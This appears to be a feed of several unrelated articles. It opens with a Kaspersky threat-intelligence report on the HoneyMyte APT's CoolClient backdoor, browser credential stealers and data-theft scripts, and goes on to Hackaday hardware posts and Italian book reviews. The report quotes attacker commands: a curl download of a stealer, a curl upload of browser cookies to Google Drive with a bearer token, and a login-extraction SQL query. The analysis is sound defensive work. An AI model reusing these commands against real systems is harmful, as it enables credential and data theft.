Over the past few years, we’ve been observing and monitoring the espionage activities of HoneyMyte (aka Mustang Panda or Bronze President) within Asia and Europe, with the Southeast Asia region being the most affected. The primary targets of most of the group’s campaigns were government entities.

As an APT group, HoneyMyte uses a variety of sophisticated tools to achieve its goals. These tools include ToneShell, PlugX, Qreverse and CoolClient backdoors, Tonedisk and SnakeDisk USB worms, among others. In 2025, we observed HoneyMyte updating its toolset by enhancing the CoolClient backdoor with new features, deploying several variants of a browser login data stealer, and using multiple scripts designed for data theft and reconnaissance.

Additional information about this threat, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. If you are interested, please contact intelreports@kaspersky.com.

CoolClient backdoor

An early version of the CoolClient backdoor was first discovered by Sophos in 2022, and TrendMicro later documented an updated version in 2023. Fast forward to our recent investigations, we found that CoolClient has evolved quite a bit, and the developers have added several new features to the backdoor. This updated version has been observed in multiple campaigns across Myanmar, Mongolia, Malaysia and Russia where it was often deployed as a secondary backdoor in addition to PlugX and LuminousMoth infections.

In our observations, CoolClient was typically delivered alongside encrypted loader files containing encrypted configuration data, shellcode, and in-memory next-stage DLL modules. These modules relied on DLL sideloading as their primary execution method, which required a legitimate signed executable to load a malicious DLL. Between 2021 and 2025, the threat actor abused signed binaries from various software products, including BitDefender, VLC Media Player, Ulead PhotoImpact, and several Sangfor solutions.

Variants of CoolClient abusing different software for DLL sideloading (2021–2025)

The latest CoolClient version analyzed in this article abuses legitimate software developed by Sangfor. Below, you can find an overview of how it operates. It is worth noting that its behavior remains consistent across all variants, except for differences in the final-stage features.

Overview of CoolClient execution flow

However, it is worth noting that in another recent campaign involving this malware in Pakistan and Myanmar, we observed that HoneyMyte has introduced a newer variant of CoolClient that drops and executes a previously unseen rootkit. A separate report will be published in the future that covers the technical analysis and findings related to this CoolClient variant and the associated rootkit.

CoolClient functionalities

In terms of functionality, CoolClient collects detailed system and user information. This includes the computer name, operating system version, total physical memory (RAM), network details (MAC and IP addresses), logged-in user information, and descriptions and versions of loaded driver modules. Furthermore, both old and new variants of CoolClient support file upload to the C2, file deletion, keylogging, TCP tunneling, reverse proxy listening, and plugin staging/execution for running additional in-memory modules. These features are still present in the latest versions, alongside newly added functionalities.

In this latest variant, CoolClient relies on several important files to function properly:

Parameter modes in second-stage DLL

CoolClient typically requires three parameters to function properly. These parameters determine which actions the malware is supposed to perform. The following parameters are supported.

Final stage DLL

The write.exe process decrypts and launches the main.dat file, which contains the third (final) stage DLL. CoolClient’s core features are implemented in this DLL. When launched, it first checks whether the keylogger, clipboard stealer, and HTTP proxy credential sniffer are enabled. If they are, CoolClient creates a new thread for each specific functionality. It is worth noting that the clipboard stealer and HTTP proxy credential sniffer are new features that weren’t present in older versions.

Clipboard and active windows monitor

A new feature introduced in CoolClient is clipboard monitoring, which leverages functions that are typically abused by clipboard stealers, such as GetClipboardData and GetWindowTextW, to capture clipboard information.

CoolClient also retrieves the window title, process ID and current timestamp of the user’s active window using the GetWindowTextW API. This information enables the attackers to monitor user behavior, identify which applications are in use, and determine the context of data copied at a given moment.

The clipboard contents and active window information are encrypted using a simple XOR operation with the byte key 0xAC, and then written to a file located at C:\ProgramData\AppxProvisioning.xml.

HTTP proxy credential sniffer

Another notable new functionality is CoolClient’s ability to extract HTTP proxy credentials from the host’s HTTP traffic packets. To do so, the malware creates dedicated threads to intercept and parse raw network traffic on each local IP address. Once it is able to intercept and parse the traffic, CoolClient starts extracting proxy authentication credentials from HTTP traffic intercepted by the malware’s packet sniffer.

The function operates by analyzing the raw TCP payload to locate the Proxy-Connection header and ensure the packet is relevant. It then looks for the Proxy-Authorization: Basic header, extracts and decodes the Base64-encoded credential and saves it in memory to be sent later to the C2.

Function used to find and extract Base64-encoded credentials from HTTP proxy-authorization headers

C2 command handler

The latest CoolClient variant uses TCP as the main C2 communication protocol by default, but it also has the option to use UDP, similar to the previous variant. Each incoming payload begins with a four-byte magic value to identify the command family. However, if the command is related to downloading and running a plugin, this value is absent. If the client receives a packet without a recognized magic value, it switches to plugin mode (mechanism used to receive and execute plugin modules in memory) for command processing.

0xFFAABBCC – Beacon and configuration commands

Below is the command menu to manage client status and beaconing:

0xFFAABBCD – Operational commands

This command group implements functionalities such as data theft, proxy setup, and file manipulation. The following is a breakdown of known subcommands:

CoolClient plugins

CoolClient supports multiple plugins, each dedicated to a specific functionality. Our recent findings indicate that the HoneyMyte group actively used CoolClient in campaigns targeting Mongolia, where the attackers pushed and executed a plugin named FileMgrS.dll through the C2 channel for file management operations.

Further sample hunting in our telemetry revealed two additional plugins: one providing remote shell capability (RemoteShellS.dll), and another focused on service management (ServiceMgrS.dll).

ServiceMgrS.dll – Service management plugin

This plugin is used to manage services on the victim host. It can enumerate all services, create new services, and even delete existing ones. The following table lists the command IDs and their respective actions.

FileMgrS.dll – File management plugin

A few basic file operations are already supported in the operational commands of the main CoolClient implant, such as listing directory contents and deleting files. However, the dedicated file management plugin provides a full set of file management capabilities.

RemoteShellS.dll – Remote shell plugin

Based on our analysis of the main implant, the C2 command handler did not implement remote shell functionality. Instead, CoolClient relied on a dedicated plugin to enable this capability. This plugin spawns a hidden cmd.exe process, redirecting standard input and output through pipes, which allows the attacker to send commands into the process and capture the resulting output. This output is then forwarded back to the C2 server for remote interaction.

CoolClient plugin that spawns cmd.exe with redirected I/O and forwards command output to C2

Browser login data stealer

While investigating suspicious ToneShell backdoor traffic originating from a host in Thailand, we discovered that the HoneyMyte threat actor had downloaded and executed a malware sample intended to extract saved login credentials from the Chrome browser as part of their post-exploitation activities. We will refer to this sample as Variant A. On the same day, the actor executed a separate malware sample (Variant B) targeting credentials stored in the Microsoft Edge browser. Both samples can be considered part of the same malware family.

During a separate threat hunting operation focused on HoneyMyte’s QReverse backdoor, we retrieved another variant of a Chrome credential parser (Variant C) that exhibited significant code similarities to the sample used in the aforementioned ToneShell campaign.

The malware was observed in countries such as Myanmar, Malaysia, and Thailand, with a particular focus on the government sector.

The following table shows the variants of this browser credential stealer employed by HoneyMyte.

These stealers may be part of a new malware toolset used by HoneyMyte during post-exploitation activities.

Initial infection

As part of post-exploitation activity involving the ToneShell backdoor, the threat actor initially executed the Variant A stealer, which targeted Chrome credentials. However, we were unable to determine the exact delivery mechanism used to deploy it.

A few minutes later, the threat actor executed a command to download and run the Variant B stealer from a remote server. This variant specifically targeted Microsoft Edge credentials.
curl hxxp://45.144.165[.]65/BUIEFuiHFUEIuioKLWENFUoi878UIESf/MUEWGHui897hjkhsjdkHfjegfdh/67jksaebyut8seuhfjgfdgdfhet4SEDGF/Tools/getlogindataedge.exe -o "C:\users\[username]\libraries\getloginedge.exe"
Within the same hour that Variant B was downloaded and executed, we observed the threat actor issue another command to exfiltrate the Firefox browser cookie file (cookies.sqlite) to Google Drive using a curl command.
curl -X POST -L -H "Authorization: Bearer ya29.a0Ad52N3-ZUcb-ixQT_Ts1MwvXsO9JwEYRujRROo-vwqmSW006YxrlFSRjTuUuAK-u8UiaQt7v0gQbjktpFZMp65hd2KBwnY2YdTXYAKhktWi-v1LIaEFYzImoO7p8Jp01t29_3JxJukd6IdpTLPdXrKINmnI9ZgqPTWicWN4aCgYKAQ4SARASFQHGX2MioNQPPZN8EkdbZNROAlzXeQ0174" -F "metadata={name :'8059cookies.sqlite'};type=application/json;charset=UTF-8" -F "file=@"$appdata\Mozilla\Firefox\Profiles\i6bv8i9n.default-release\cookies.sqlite";type=application/zip" -k "https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart"

Variant C analysis

Unlike Variants A and B, which use hardcoded file paths, the Variant C stealer accepts two runtime arguments: file paths to the browser’s Login Data and Local State files. This provides greater flexibility and enables the stealer to target any Chromium-based browser such as Chrome, Edge, Brave, or Opera, regardless of the user profile or installation path. An example command used to execute Variant C is as follows:
Jarte.exe "C:\Users\[username]\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\[username]\AppData\Local\Google\Chrome\User Data\Local State"
In this context, the Login Data file is an SQLite database that stores saved website login credentials, including usernames and AES-encrypted passwords. The Local State file is a JSON-formatted configuration file containing browser metadata, with the most important value being encrypted_key, a Base64-encoded AES key. It is required to decrypt the passwords stored in the Login Data database and is also encrypted.

When executed, the malware copies the Login Data file to the user’s temporary directory as chromeTmp.

Function that copies Chrome browser login data into a temporary file (chromeTmp) for exfiltration

To retrieve saved credentials, the malware executes the following SQL query on the copied database:
SELECT origin_url, username_value, password_value FROM logins
This query returns the login URL, stored username, and encrypted password for each saved entry.

Next, the malware reads the Local State file to extract the browser’s encrypted master key. This key is protected using the Windows Data Protection API (DPAPI), ensuring that the encrypted data can only be decrypted by the same Windows user account that created it. The malware then uses the CryptUnprotectData API to decrypt this key, enabling it to access and decrypt password entries from the Login Data SQLite database.

With the decrypted AES key in memory, the malware proceeds to decrypt each saved password and reconstructs complete login records.

Finally, it saves the results to the text file C:\Users\Public\Libraries\License.txt.

Login data stealer’s attribution

Our investigation indicated that the malware was consistently used in the ToneShell backdoor campaign, which was attributed to the HoneyMyte APT group.
Another factor supporting our attribution is that the browser credential stealer appeared to be linked to the LuminousMoth APT group, which has previously been connected to HoneyMyte. Our analysis of LuminousMoth’s cookie stealer revealed several code-level similarities with HoneyMyte’s credential stealer. For example, both malware families used the same method to copy targeted files, such as Login Data and Cookies, into a temporary folder named ChromeTmp, indicating possible tool reuse or a shared codebase.

Code similarity between HoneyMyte’s saved login data stealer and LuminousMoth’s cookie stealer

Both stealers followed the same steps: they checked if the original Login Data file existed, located the temporary folder, and copied the browser data into a file with the same name.

Based on these findings, we assess with high confidence that HoneyMyte is behind this browser credential stealer, which also has a strong connection to the LuminousMoth APT group.

Document theft and system information reconnaissance scripts

In several espionage campaigns, HoneyMyte used a number of scripts to gather system information, conduct document theft activities and steal browser login data. One of these scripts is a batch file named 1.bat.

1.bat – System enumeration and data exfiltration batch script

The script starts by downloading curl.exe and rar.exe into the public folder. These are the tools used for file transfer and compression.

Batch script that downloads curl.exe and rar.exe from HoneyMyte infrastructure and executes them for file transfer and compression

It then collects network details and downloads and runs the nbtscan tool for internal network scanning.

Batch script that performs network enumeration and saves the results to the log.dat file for later exfiltration

During enumeration, the script also collects information such as stored credentials, the result of the systeminfo command, registry keys, the startup folder list, the list of files and folders, and antivirus information into a file named log.dat. It then uploads this file via FTP to http://113.23.212[.]15/pub/.

Batch script that collects registry, startup items, directories, and antivirus information for system profiling

Next, it deletes both log.dat and the nbtscan executable to remove traces. The script then terminates browser processes, compresses browser-related folders, retrieves FileZilla configuration files, archives documents from all drives with rar.exe, and uploads the collected data to the same server.

Finally, it deletes any remaining artifacts to cover its tracks.

Ttraazcs32.ps1 – PowerShell-based collection and exfiltration

The second script observed in HoneyMyte operations is a PowerShell file named Ttraazcs32.ps1.

Similar to the batch file, this script downloads curl.exe and rar.exe into the public folder to handle file transfers and compression. It collects computer and user information, as well as network details such as the public IP address and Wi-Fi network data.

All gathered information is written to a file, compressed into a password-protected RAR archive and uploaded via FTP.

In addition to system profiling, the script searches multiple drives including C:\Users\Desktop, Downloads, and drives D: to Z: for recently modified documents. Targeted file types include .doc, .xls, .pdf, .tif, and .txt, specifically those changed within the last 60 days. These files are also compressed into a password-protected RAR archive and exfiltrated to the same FTP server.

t.ps1 – Saved login data collection and exfiltration

The third script attributed to HoneyMyte is a PowerShell file named t.ps1.

The script requires a number as a parameter and creates a working directory under D:\temp with that number as the directory name. The number is not related to any identifier. It is simply a numeric label that is probably used to organize stolen data by victim. If the D drive doesn’t exist on the victim’s machine, the new folder will be created in the current working directory.

The script then searches the system for Chrome and Chromium-based browser files such as Login Data and Local State. It copies these files into the target directory and extracts the encrypted_key value from the Local State file. It then uses Windows DPAPI (System.Security.Cryptography.ProtectedData) to decrypt this key and writes the decrypted Base64-encoded key into a new file named Local State-journal in the same directory. For example, if the original file is C:\Users\$username \AppData\Local\Google\Chrome\User Data\Local State, the script creates a new file C:\Users\$username\AppData\Local\Google\Chrome\User Data\Local State-journal, which the attacker can later use to access stored credentials.

PowerShell script that extracts and decrypts the Chrome encrypted_key from the Local State file before writing the result to a Local State-journal file

Once the credential data is ready, the script verifies that both rar.exe and curl.exe are available. If they are not present, it downloads them directly from Google Drive. The script then compresses the collected data into a password-protected archive (the password is “PIXELDRAIN”) and uploads it to pixeldrain.com using the service’s API, authenticated with a hardcoded token. Pixeldrain is a public file-sharing service that attackers abuse for data exfiltration.

Script that compresses data with RAR, and exfiltrates it to Pixeldrain via API

This approach highlights HoneyMyte’s shift toward using public file-sharing services to covertly exfiltrate sensitive data, especially browser login credentials.

Conclusion

Recent findings indicate that HoneyMyte continues to operate actively in the wild, deploying an updated toolset that includes the CoolClient backdoor, a browser login data stealer, and various document theft scripts.

With capabilities such as keylogging, clipboard monitoring, proxy credential theft, document exfiltration, browser credential harvesting, and large-scale file theft, HoneyMyte’s campaigns appear to go far beyond traditional espionage goals like document theft and persistence. These tools indicate a shift toward the active surveillance of user activity that includes capturing keystrokes, collecting clipboard data, and harvesting proxy credential.

Organizations should remain highly vigilant against the deployment of HoneyMyte’s toolset, including the CoolClient backdoor, as well as related malware families such as PlugX, ToneShell, Qreverse, and LuminousMoth. These operations are part of a sophisticated threat actor strategy designed to maintain persistent access to compromised systems while conducting high-value surveillance activities.

Indicators of compromise

CoolClient
F518D8E5FE70D9090F6280C68A95998F libngs.dll
1A61564841BBBB8E7774CBBEB3C68D5D loader.dat
AEB25C9A286EE4C25CA55B72A42EFA2C main.dat
6B7300A8B3F4AAC40EEECFD7BC47EE7C time.dat

CoolClient plugins
7AA53BA3E3F8B0453FFCFBA06347AB34 ServiceMgrS.dll
A1CD59F769E9E5F6A040429847CA6EAE FileMgrS.dll
1BC5329969E6BF8EF2E9E49AAB003F0B RemoteShellS.dll

Browser login data stealer
1A5A9C013CE1B65ABC75D809A25D36A7 Variant A
E1B7EF0F3AC0A0A64F86E220F362B149 Variant B
DA6F89F15094FD3F74BA186954BE6B05 Variant C

Scripts
C19BD9E6F649DF1DF385DEEF94E0E8C4 1.bat
838B591722512368F81298C313E37412 Ttraazcs32.ps1
A4D7147F0B1CA737BFC133349841AABA t.ps1

CoolClient C2
account.hamsterxnxx[.]com
popnike-share[.]com
japan.Lenovoappstore[.]com

FTP server
113.23.212[.]15

securelist.com/honeymyte-updat…

When last we saw [xoreaxeax], he had built a lens-less optical microscope that deduced the structure of a sample by recording the diffraction patterns formed by shining a laser beam through it. At the time, he noted that the diffraction pattern was a frequency decomposition of the specimen’s features – in other terms, a Fourier transform. Now, he’s back with an explanation of why this is, deriving equations for the Fourier transform from the first principles of diffraction (German video, but with auto-translated English subtitles. Beware: what should be “Huygens principle” is variously translated as “squirrel principle,” “principle of hearing,” and “principle of the horn”).

The first assumption was that light is a wave that can be adequately represented by a sinusoidal function. For the sake of simplicity (you’ll have to take our word for this), the formula for a sine wave was converted to a complex number in exponential form. According to the Huygens principle, when light emerges from a point in the sample, it spreads out in spherical waves, and the wave at a given point can therefore be calculated simply as a function of distance. The principle of superposition means that whenever two waves pass through the same point, the amplitude at that point is the sum of the two. Extending this summation to all the various light sources emerging from the sample resulted in an infinite integral, which simplified to a particular form of the Fourier transform.

One surprising consequence of the relation is the JPEG representation of a micrograph of some onion cells. JPEG compression calculates the Fourier transform of an image and stores it as a series of sine-wave striped patterns. If one arranges tiles of these striped patterns according to stripe frequency and orientation, then shades each tile according to that pattern’s contribution to the final image, one gets a speckle pattern with a bright point in the center. This closely resembles the diffraction pattern created by shining a laser through those onion cells.

For the original experiment that generated these patterns, check out [xoreaxeax]’s original ptychographical microscope. Going in the opposite direction, researchers have also used physical structures to calculate Fourier transforms.

youtube.com/embed/zjw9lhaivTY?…

hackaday.com/2026/01/27/why-di…

La verità è un concetto mobile e sfuggente, i cui confini cambiano in relazione alla temperie culturale e all’azione dei soggetti che hanno i mezzi per costruirla e farla accettare.

Già nel V secolo però, Platone metteva in guardia i cittadini di Atene che per instaurare la democrazia bisognava cacciare i retori e i sofisti, che ingannano il popolo con sillogismi, paralogismi, notizie false e inventate.

Ma la società della comunicazione, basata su persuasione e populismo, non è in grado di scacciare i nuovi retori che assumono le vesti di imbonitori e tribuni di un popolo costruito algoritmicamente.

Nel libro «Le disavventure della verità», il filosofo Umberto Galimberti affronta così il tema della verità in un’ottica comparata confrontando Marx, Nietsche e Freud nelle loro pubblicazioni meno note. Ovviamente con riferimento alla Repubblica di Platone e a quello sfortunato che informò i cavernicoli che erano oggetto di un’illusione (disinformazione, diremmo oggi). Lo sfortunato fu bastonato dai cavernicoli per la sua rivelazione.

[…] a differenza dei tempi trascorsi, oggi l’abbondanza delle informazioni, che è il tratto tipico del nostro tempo, ci rende responsabili di ciò che sappiamo e se, per quieto vivere, per noia, per distrazione, per disinteresse, per stanchezza o per assuefazione, non siamo sensibili al problema della verità, di fronte a quel che sappiamo diventiamo irrimediabilmente indifferenti, quando non addirittura immorali.

Oggi, infatti, dobbiamo chiederci che ne è della verità nella nostra epoca caratterizzata dall’incontenibile diffusione dei media, ai quali da ultimo si sono aggiunti i social con le loro vere e false notizie e prese di posizioni, per lo più acritiche, quando non puri sfoghi pulsionali o emotivi. Per affrontare questo tema bisogna liquidare quei luoghi comuni, per non dire idee arretrate che fanno da tacita guida a quasi tutte le riflessioni sui media, secondo le quali l’uomo può usare i mezzi di comunicazione come qualcosa di neutrale rispetto alla sua natura… […]

Al tempo della guerra ibrida, quella che mescola la falsa informazione alle azioni militari, il sabotaggio della verità ci riguarda tutti.

«Le disavventure della verità», Umberto Galimberti, Feltrinelli, 2025

dicorinto.it/articoli/recensio…

Palantir è il nuovo potere della sorveglianza globale. Anche i Servizi Segreti francesi hanno ammesso di usarne tecnologia e capacità di analisi. E lo fanno pure la Ferrari, Stellantis, il Policlinico Gemelli in Italia.
I software di Palantir sono in uso anche all’esercito israeliano. Il suo board nel 2024 ha tenuto una seduta del consiglio di amministrazione a Tel Aviv in segno di solidarietà dopo l’attacco terroristico del 7 ottobre 2023.

Ma che cos’è Palantir? Palantir è la nuova macchina del potere americano creata da Peter Thiel, il magnate che ha fondato l’azienda prendendone il nome dalla saga del Signore degli Anelli. Palantir è l’occhio che tutto vede e che nella saga consente ai cattivi di intimidire, trovare e punire, non i cattivi, ma i buoni della storia, cioè la famosa compagnia dell’Anello.

Nella prospettiva di Thiel e di Alex Karp, attuale Ceo di Palantir, però è tutto rovesciato. L’occhio che tutto vede, cioè i suoi software Gotham e Foundry, potenziati dal coordinamento di una terza piattaforma, Apollo, e dall’intelligenza artificiale IAP, sono gli strumenti della nuova sorveglianza che sovrintende alla macchina da guerra americana e degli eserciti che se lo possono permettere. Come quello di Israele.

Palantir è una macchina indifferente all’etica e alla morale occidentale e illuministica.
Dopo alcuni servizi giornalistici sappiamo che Palantir, vende dati per fare la guerra. E poi li usa per foraggiare il suo spin off, Anduril, azienda dedicata alla produzione di IA e droni da combattimento.

Ma è solo nel libro «Il momento straussiano» che capiamo perché Peter Thiel, tecnologo, gay, cattolico, conservatore, con Palantir si sia definitivamente sganciato dalla retorica di benessere, progresso e uguaglianza prodotta dall’immaginifica
industria della Silicon Valley negli ultimi 30 anni fino a farla ribaltare nelle sue convinzioni più profonde, un tempo basate sul «don’t be evil» (non fare il male).
Nel libro Thiel lo spiega. E quello che dice fa venire i brividi, affermando che l’Occidente deve farsi rispettare usando la violenza e la deterrenza quali elementi attivi di civilizzazione e di difesa della sua missione teleologica e salvifica del mondo.
Usando cioè i mezzi contrari alla cultura occidentale dei diritti che essa dovrebbero affermare e perseguire.

«Peter Thiel, Il momento straussiano. A cura di Andrea Venanzoni. Liberilibri 2025»

dicorinto.it/articoli/recensio…

If you are interested in historical big computers, you probably think of IBM, with maybe a little thought of Sperry Rand or, if you go smaller, HP, DEC, and companies like Data General. But you may not have heard of Tandem Computers unless you have dealt with systems where downtime was unacceptable. Printing bills or payroll checks can afford some downtime while you reboot or replace a bad board. But if your computer services ATM machines, cash registers, or a factory, that’s another type of operation altogether. That was where Tandem computers made their mark, and [Asianometry] recounts their history in a recent video that you can watch below.

When IBM was king, your best bet for having a computer running nonstop was to have more than one computer. But that’s pricey. Computers might have some redundancy, but it is difficult to avoid single points of failure. For example, if you have two computers with a single network connection and a single disk drive. Then failures in the network connection or the disk drive will take the system down.

The idea started with an HP engineer, but HP wasn’t interested. Tandem was founded on the idea of building a computer that would run continuously. In fact, the name was “the non-stop.” The idea was that smaller computer systems could be combined to equal the performance of a big computer, while any single constituent system failing would still allow the computer to function. It was simply slower. Even the bus that tied the computers together was redundant. Power supplies had batteries so the machines would keep working even through short power failures.

Not only does this guard against failures, but it also allows you to take a single computer down for repair or maintenance without stopping the system. You could also scale performance by simply adding more computers.

Citibank was the first customer, and the ATM industry widely adopted the system. The only issue was that Tandem programs required special handling to leverage the hardware redundancy. Competitors were able to eat market share by providing hardware-only solutions.

The changing computer landscape didn’t help Tandem, either. Tandem was formed at a time when computer hardware was expensive, so using a mostly software solution to a problem made sense. But over time, hardware became both more reliable and less expensive. Software, meanwhile, got more expensive. You can see where this is going.

The company flailed and eventually would try to reinvent itself as a software company. Before that transition could work or fail, Compaq bought the company in 1997. Compaq, of course, would also buy DEC, and then it was all bought up by HP — oddly enough, where the idea for Tandem all started.

There’s a lot of detail in the video, and if you fondly remember Tandem, you’ll enjoy all the photos and details on the company. If you need redundancy down at the component level, you’ll probably need voting.

youtube.com/embed/SSSB7ZTSXH4?…

hackaday.com/2026/01/26/the-hi…

Today marks an auspicious anniversary which might have passed us by had it not been for [Diamond Geezer], who reminds us that it’s a hundred years since the first public demonstration of television by John Logie Baird. In a room above what is today a rather famous Italian coffee shop in London’s Soho, he had assembled a complete mechanical TV system that he demonstrated to journalists.

Television is one of those inventions that owes its genesis to more than a single person, so while Baird was by no means the only one inventing in the field, he was the first to demonstrate a working system. With mechanical scanning and just 30 lines, it’s hardly HD or 4K, but it does have the advantage of being within the reach of the constructor.

Perhaps the saddest thing about Baird and his system is that while he was able to attract the interest of the BBC in it, when the time came for dedicated transmissions at a higher resolution, his by then partly mechanical system could not compete and he faded into relative obscurity. Brits instead received EMI’s 405 line system, which persisted until the very start of the 1980s, and eventually the German PAL colour system in the late 1960s.

So head on down to Bar Italia if you can to raise a coffee to his memory, and should you wish to have a go at Baird-style TV for yourself, then you may need to print yourself a disk.

Header image: Matt Brown, CC BY 2.0.

hackaday.com/2026/01/26/one-hu…

An analog telephone adapter (ATA), or FXS gateway, is a device that allows traditional analog phones to be connected to a digital voice-over-IP (VoIP) network. In addition to this, you can even create a local phone exchange using just analog phones without connecting to a network as [Playful Technology] demonstrates in a recent video.

The ATA used in the video is the Grandstream HT802, which features one 10/100 Mbps Ethernet port and two RJ11 FXS ports for two POTS phones, allowing for two phones to be directly connected and configured using their own profiles.

By using a multi-FXS port ATA in this manner, you essentially can set up your own mini telephone exchange, with a long run of Cat-3 possible between an individual phone and the ATA. Use of the Ethernet port is necessary just once to configure the ATA, as demonstrated in the video. The IP address of the ATA is amusingly obtained by dialing *** on a connected phone and picking 02 as menu option after which a synthetic voice reads out the number. This IP address gets you into the administration interface.

To configure the ATA as an exchange, the local loopback address is used, along with a dial alias configured in the ‘Dial Plan’ section. This way dialing e.g. 102 gets internally converted to dial the other FXS port. By setting up a similar plan on the other FXS port both phones can call each other, but it’s also possible to auto-dial when you lift the handset off the hook.

The rather hacky configuration ought to make clear that the ATA was not designed to be used in this manner, but if your use case involves this kind of scenario, it’s probably one of the cheaper ways to set up a basic, small phone exchange. There are even ATA models that have more than two ports, opening up more possibilities. Just keep in mind that not every ATA may support this kind of tweaking.

youtube.com/embed/-dD4Xepac8o?…

hackaday.com/2026/01/26/create…

Before the refrigerator became a normal part of any kitchen, those with enough money to throw around could get an icebox, which used melting ice to cool food and drinks in a second compartment. As refrigerators became available for sale in the 1920s, this created somewhat awkward transition models, like the 1924 Frigidaire B-9 that [David Allen] recently got offered for a restoration. This was part of the restoration of a 1926 house, which foresaw putting this venerable unit back into operation.

As [David] explains, this refrigerator was still in use until about 1970 when it broke down, and repairs proved tricky. Clearly, the fault wasn’t that severe as [David] got it working again after a number of small repairs and a lot of maintenance. The running unit with its basic elements can be seen purring away in the completion video, with the journey to get there covered in a video series starting with the first episode.

What’s fascinating is that during this aforementioned transition period, the vapor compression electric cooling system was an optional extra, meaning that the basic layout is still that of an icebox. Correspondingly, instead of ice in the ice compartment, you find the low-side float evaporator, with the basement section containing the condensing unit, motor, and compressor. The temperature sensor is also a miracle of simplicity, using bellows that respond to the temperature and thus volume of the evaporator coolant, which trigger a switch that turns on the compressor.

Despite a hundred years having passed since this refrigerator was constructed, at its core it works exactly the same as the unit we have in our kitchens today, albeit with higher efficiency, more electronics, and with the sulfur dioxide refrigerant replaced with something less toxic to us humans.

youtube.com/embed/lieog1_yNCo?…

youtube.com/embed/xICtNFbvEH0?…

hackaday.com/2026/01/26/restor…

I love, love, love Saturn by [Rain2], which comes in two versions. The first, which is notably more complex, is shown here with its rings-of-Saturn thumb clusters.

Image by [Rain2] via redditSo what was the impetus for this keyboard? It’s simple: a friend mentioned that ergo keyboards are a no-go if you need a num pad really bad.

Saturn has one built right in. The basic idea was to add a num pad while keeping the total number of keys to a minimum. Thanks to a mod key, this area can be many things, including but not limited to a num pad.

As far as the far-out shape goes, and I love that the curvature covers the thumb cluster and the index finger, [Rain2] wanted to get away from the traditional thumb cluster design. Be sure to check out the back of the boards in the image gallery.

Unfortunately, this version is too complicated to make, so v2 does not have the cool collision shapes going for it. But it is still an excellent keyboard, and perhaps will be open source someday.

Phanny Kicks Butt

Say hello to Phanny, a custom 52-key wireless split from [SfBattleBeagle]. This interestingly-named board has a custom splay that they designed from the ground up along with PCBWay, who sponsored the PCBs in the first place.

Image by [SfBattleBeagle] via GitHubI personally think the thumb keys go a little too far inward for my taste, but I’m certain that [SfBattleBeagle]’s hands must be different. Probably doesn’t have these stubby little thumbs.

While Ergogen is all the rage, [SfBattleBeagle] still opts to use Fusion and KiCad, preferring the UI of the average CAD program. If you’re wondering about the lack of palm rests, the main reason is that [SfBattleBeagle] tends to bounce between screens, as well as moving between the split and the num pad. To that end, they are currently designing a pair of sliding wrist skates that I would love to hear more about.

Be sure to check out the GitHub repo for all the details and a nice build guide. [SfBattleBeagle] says this is a fun project and results in a very comfy board.

The Centerfold: Mantis WIP is Captivating

Image by [luckybipedal] via redditI love it when I can provide a lovely centerfold that’s also got a lot of story behind it. This is Mantis, a work-in-progress by [luckybipedal] aka [Felix Kühling]. You can read a lot more on GitHub, and the reasoning behind the design choices in [Felix]’s write-up over on KBD News. [Felix] expects to build the first prototypes in March or April, and publish a final design and build guide later this spring.

Via reddit

Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!

Historical Clackers: the Masspro

I must say, the Antikey Chop doesn’t have much to say about the Masspro typewriter, and for good reason.
Image via The Antikey Chop
But here’s what we know: the Masspro was invented by a George Francis Rose, who was the son of Frank S. Rose, inventor of the Standard Folding Typewriter. That machine was the predecessor to the Corona No. 3.

Frank died right as the Rose Typewriter Co. was starting to get somewhere. George took over, but then it needed financing pretty badly.

Angel investor and congressman Bill Conger took over the company, relocated, and renamed it the Standard Folding Typewriter Co. According to the Antikey Chop, “selling his father’s company was arguably George’s greatest contribution to typewriter history”.

George Rose was an engineer like his father, but he was not very original when it came to typewriters. The Masspro is familiar yet foreign, and resembles the Corona Four. Although the patent was issued in 1925, production didn’t begin until 1932, and likely ended within to years.
Image via Oz Typewriter
Why? It was the wrong machine at the wrong time. Plus, it was poorly built, and bore a double-shift keyboard which was outdated by this time. And, oh yeah, the company was started during the Depression.

But I like the Masspro. I think my favorite part, aside from the open keyboard, is the logo, which looks either like hieroglyphics or letters chiseled into a stone tablet.

I also like the textured firewall area where the logo is stamped. The Antikey Chop calls this a crinkle finish. Apparently, they came in black, blue, green, and red. The red isn’t candy apple, it’s more of an ox-blood red, and that’s just fine with me. I’d love to see the blue and green, though. Oh, here’s the green.

Finally, a Trackball Mouse With Nice Switches

Okay, so Keychron’s new Nape Pro mouse is pretty darn cool, and this is the best picture I could find that actually shows how you’re supposed to implement this thing on your desk. Otherwise, it looks like some kind of presentation remote.
Image via Yanko Design
So the idea here is to never take your hands off the keyboard to mouse, although you can use it off to the side like a regular trackball if you want. I say the ability to leave your fingers on the home row is even better.

There are plenty of keyboards with trackpads and other mousing functions that let you do this. But maybe you’re not ready to go that far. This mouse is a nice, easy first step.

The ball is pretty small at 25 mm. For comparison, the M575 uses a 34 mm ball, which is pretty common for trackball mice. Under those six buttons are quiet Huano micro switches, which makes sense, but I personally think loud-ish mice are nice enough.

I’ve never given it much thought, but the switches on my Logitech M575 are nice and clicky. I wonder how these compare, but I don’t see a sound sample. If the Nape Pro switches sound anything like this, then wowsers, that is quiet.
Image via Yanko Design
The super-cool part here is the software and orientation system, which they call OctaShift. The thing knows how it’s positioned and can remap its functions to match. M1 and M2 are meant to be your primary mouse buttons, and they are reported to be comfortable to reach in any position.

Inside you’ll find a Realtek chip with a 1 kHz polling rate along with a PixArt PAW3222 sensor, which puts this mouse in the realm of decent wireless gaming mice. But the connectivity choice is yours between dongle, Bluetooth, and USB-C cable.

And check this out: the firmware is ZMK, and Keychron plans to release the case STLs. Finally, it seems the mouse world is catching up with the keyboard world a bit.

Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.

hackaday.com/2026/01/26/keebin…

IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and will be speaking on a webinar hosted by the Knight Georgetown Institute on Jan 28. The topic: how to improve access to social media data to support greater transparency and accountability. You can sign up here (the webinar starts at 11am ET / 5pm CET / 4pm UK).

